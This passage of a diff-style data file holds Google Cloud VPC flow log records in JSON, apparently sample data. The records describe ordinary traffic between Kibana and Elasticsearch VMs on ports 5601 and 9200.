ork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroa","jsonPayload":{"bytes_sent":"67337","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"351","reporter":"DEST","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroi","jsonPayload":{"bytes_sent":"136375","connection":{"dest_ip":"10.87.40.76","dest_port":33538,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero8","jsonPayload":{"bytes_sent":"181424","connection":{"dest_ip":"67.43.156.13","dest_port":33690,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393929808Z","packets_sent":"241","reporter":"SRC","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erol","jsonPayload":{"bytes_sent":"9303","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"94","reporter":"DEST","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero4","jsonPayload":{"bytes_sent":"142871","connection":{"dest_ip":"67.43.156.13","dest_port":33572,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821149051Z","packets_sent":"77","reporter":"SRC","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eror","jsonPayload":{"bytes_sent":"158811","connection":{"dest_ip":"67.43.156.13","dest_port":33968,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"69","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erob","jsonPayload":{"bytes_sent":"13455","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"81","reporter":"DEST","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erox","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":57300,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroc","jsonPayload":{"bytes_sent":"71014","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65315},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"728","reporter":"DEST","rtt_msec":"210","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erok","jsonPayload":{"bytes_sent":"60749","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eros","jsonPayload":{"bytes_sent":"160451","connection":{"dest_ip":"67.43.156.13","dest_port":33880,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821138391Z","packets_sent":"66","reporter":"SRC","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erod","jsonPayload":{"bytes_sent":"169173","connection":{"dest_ip":"10.87.40.76","dest_port":33574,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"64","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero6","jsonPayload":{"bytes_sent":"118762","connection":{"dest_ip":"67.43.156.13","dest_port":65315,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"615","reporter":"SRC","rtt_msec":"210","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eron","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"96","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project",
"subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroy","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":57300},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erof","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":54662,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erov","jsonPayload":{"bytes_sent":"11674","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_n
ame":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erop","jsonPayload":{"bytes_sent":"62831","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"346","reporter":"DEST","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erou","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"93","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":54662},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
+{"insertId":"y4wffpfk2erow","jsonPayload":{"bytes_sent":"64588","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
+{"insertId":"y4wffpfk2erot","jsonPayload":{"bytes_sent":"67315","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"354","reporter":"DEST","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
+{"insertId":"y4wffpfk2eroq","jsonPayload":{"bytes_sent":"175633","connection":{"dest_ip":"10.87.40.76","dest_port":33576,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"67","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero5","jsonPayload":{"bytes_sent":"116981","connection":{"dest_ip":"67.43.156.13","dest_port":33540,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"234","reporter":"SRC","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroo","jsonPayload":{"bytes_sent":"67789","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.542406314Z","packets_sent":"344","reporter":"DEST","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"ptjoddfhmrhg9","jsonPayload":{"bytes_sent":"136166","connection":{"dest_ip":"67.43.156.13","dest_port":33538,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"245","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgh","jsonPayload":{"bytes_sent":"68262","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65257},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"718","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
